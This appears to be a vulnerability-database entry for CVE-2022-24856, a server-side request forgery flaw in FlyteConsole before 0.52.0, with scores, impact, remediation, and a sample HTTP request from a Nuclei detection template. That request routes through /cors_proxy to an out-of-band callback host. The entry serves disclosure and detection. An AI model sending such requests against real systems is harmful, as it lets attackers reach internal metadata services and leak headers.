| Title | Flyte Console <0.52.0 - Server-Side Request Forgery |
|---|---|
| Author | pdteam |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks. |
| Remediation | The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. |
| CVSS Score | 7.5 |
| EPSS Score | 0.81885 |
| CVE ID | CVE-2022-24856 |
| CWE ID | CWE-918 |
| Tags | cve2022 cve flyteconsole ssrf oss hackerone flyte vuln |
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
GET /cors_proxy/https://oast.me/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24856.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-24856.pcap
N/AN/A